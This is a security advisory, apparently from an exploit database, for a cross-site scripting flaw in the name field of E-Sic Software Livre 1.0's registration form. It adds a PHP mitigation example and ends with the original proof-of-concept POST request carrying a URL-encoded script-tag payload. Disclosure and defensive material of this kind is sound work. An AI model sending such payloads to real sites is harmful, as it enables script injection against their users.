Vendor: E-Sic Software Livre
By: Elber Tavares
CVSS: 7,5 (HIGH)
CWE: 79 (Cross Site Scripting)
Product Name: E-Sic Software Livre
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:softwarepublico.gov.br:e-sic_software_livre:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox
2017

E-Sic Software livre CMS – Cross Site Scripting

The XSS is present in the applicant registration area, where it is possible to inject code through the input that receives the user's name.

Mitigation:

Input validation, output encoding, and content security policy can be used to mitigate XSS attacks.
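
The three mitigations named above, applied to the `nome` field of the registration request, as an added PHP example that is not part of the original advisory or the E-Sic code base. The helper names `validate_nome` and `h`, the 120-character limit and the CSP value are assumptions; the mbstring extension is required.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: allowlist validation for the registration "nome" field.
// Accepts Unicode letters, combining marks, spaces, apostrophes, dots and hyphens.
function validate_nome(string $raw): ?string
{
    $nome = trim($raw);
    if ($nome === '' || mb_strlen($nome, 'UTF-8') > 120) { // 120 is an assumed limit
        return null;
    }
    // \p{L} letters, \p{M} marks (accents); anything else, such as < > " ( ), is rejected.
    if (preg_match('/^[\p{L}\p{M}][\p{L}\p{M} .\'-]*\z/u', $nome) !== 1) {
        return null;
    }
    return $nome;
}

// Hypothetical helper: encode for an HTML text node or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: a legitimate name and the "nome" value from the
// request shown on this page, URL-decoded.
$samples = [
    'José da Silva',
    rawurldecode('%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'),
];

// Defense in depth: with no 'unsafe-inline', an injected inline <script> does not run.
if (PHP_SAPI !== 'cli') {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
}

foreach ($samples as $raw) {
    $nome = validate_nome($raw);
    if ($nome === null) {
        // Rejected at input; any echo of the rejected value is still encoded.
        echo 'rejected: ', h($raw), PHP_EOL;
        continue;
    }
    // Encode at output even for validated values (covers rows stored before the fix).
    echo '<input type="text" name="nome" value="', h($nome), '">', PHP_EOL;
}
```

Output encoding is the control that closes the hole; the allowlist and the CSP header reduce exposure if an unencoded sink is missed elsewhere in the application.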

Exploit-DB raw data:

# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: http://whiteboyz.xyz/esic-software-publico-xss.html

The XSS is present in the applicant registration area,
where it is possible to inject code through the input that receives the user's name

---------------------------------------------------------------------

Url: http://localhost/esic/index/

POST: http://localhost/cadastro/index.php
DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
uf=&numero=&complemento=&acao=Salvar